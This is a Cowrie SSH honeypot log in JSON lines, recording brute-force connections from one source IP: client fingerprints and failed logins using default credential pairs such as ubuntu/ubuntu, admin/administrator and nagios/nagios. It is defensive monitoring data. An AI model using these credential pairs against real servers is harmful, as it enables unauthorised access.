{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:09:48.820344Z","src_ip":"212.227.235.229","session":"ff50c9a5b8fe"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:09:48.933491Z","src_ip":"212.227.235.229","session":"e27789cfb175"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:49.380682Z","src_ip":"212.227.235.229","session":"a83baba346ae"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:49.644195Z","src_ip":"212.227.235.229","session":"ff50c9a5b8fe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"administrator","message":"login attempt [admin/administrator] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:49.996771Z","src_ip":"212.227.235.229","session":"e27789cfb175"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:51.081360Z","src_ip":"212.227.235.229","session":"ff50c9a5b8fe"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:51.536531Z","src_ip":"212.227.235.229","session":"e27789cfb175"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59384,"dst_ip":"1.2.3.4","dst_port":22,"session":"f87bb5c0188a","protocol":"ssh","message":"New connection: 212.227.235.229:59384 (1.2.3.4:22) [session: f87bb5c0188a]","sensor":"my-vps","timestamp":"2025-08-28T08:09:54.757722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:09:55.257602Z","src_ip":"212.227.235.229","session":"f87bb5c0188a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:09:55.376751Z","src_ip":"212.227.235.229","session":"f87bb5c0188a"}
{"eventid":"cowrie.login.failed","username":"teste","password":"teste","message":"login attempt [teste/teste] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:57.417002Z","src_ip":"212.227.235.229","session":"f87bb5c0188a"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:58.734817Z","src_ip":"212.227.235.229","session":"f87bb5c0188a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48550,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffd70855751f","protocol":"ssh","message":"New connection: 212.227.235.229:48550 (1.2.3.4:22) [session: ffd70855751f]","sensor":"my-vps","timestamp":"2025-08-28T08:10:00.123029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:10:00.645576Z","src_ip":"212.227.235.229","session":"ffd70855751f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:10:00.780746Z","src_ip":"212.227.235.229","session":"ffd70855751f"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"tpuser","message":"login attempt [ftp/tpuser] failed","sensor":"my-vps","timestamp":"2025-08-28T08:10:02.098656Z","src_ip":"212.227.235.229","session":"ffd70855751f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63600,"dst_ip":"1.2.3.4","dst_port":22,"session":"d94e1c7b70c0","protocol":"ssh","message":"New connection: 217.72.205.35:63600 (1.2.3.4:22) [session: d94e1c7b70c0]","sensor":"my-vps","timestamp":"2025-08-28T08:10:03.525238Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:10:03.526915Z","src_ip":"217.72.205.35","session":"d94e1c7b70c0"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:10:03.602085Z","src_ip":"212.227.235.229","session":"ffd70855751f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58936,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b8bf940a091","protocol":"ssh","message":"New connection: 212.227.235.229:58936 (1.2.3.4:22) [session: 0b8bf940a091]","sensor":"my-vps","timestamp":"2025-08-28T08:10:08.767735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:10:09.129704Z","src_ip":"212.227.235.229","session":"0b8bf940a091"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:10:09.413532Z","src_ip":"212.227.235.229","session":"0b8bf940a091"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"nagios","message":"login attempt [nagios/nagios] failed","sensor":"my-vps","timestamp":"2025-08-28T08:10:11.385264Z","src_ip":"212.227.235.229","session":"0b8bf940a091"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:10:13.401721Z","src_ip":"212.227.235.229","session":"0b8bf940a091"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58938,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebaa193d9aee","protocol":"ssh","message":"New connection: 212.227.235.229:58938 (1.2.3.4:22) [session: ebaa193d9aee]","sensor":"my-vps","timestamp":"2025-08-28T08:10:17.582810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:10:17.802019Z","src_ip":"212.227.235.229","session":"ebaa193d9aee"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:10:17.920522Z","src_ip":"212.227.235.229","session":"ebaa193d9aee"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-28T08:10:19.628323Z","src_ip":"212.227.235.229","session":"ebaa193d9aee"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:10:21.781007Z","src_ip":"212.227.235.229","session":"ebaa193d9aee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39714,"dst_ip":"1.2.3.4","dst_port":22,"session":"1777aeae245f","protocol":"ssh","message":"New connection: 212.227.235.229:39714 (1.2.3.4:22) [session: 1777aeae245f]","sensor":"my-vps","timestamp":"2025-08-28T08:10:45.608113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:10:45.609751Z","src_ip":"212.227.235.229","session":"1777aeae245f"}
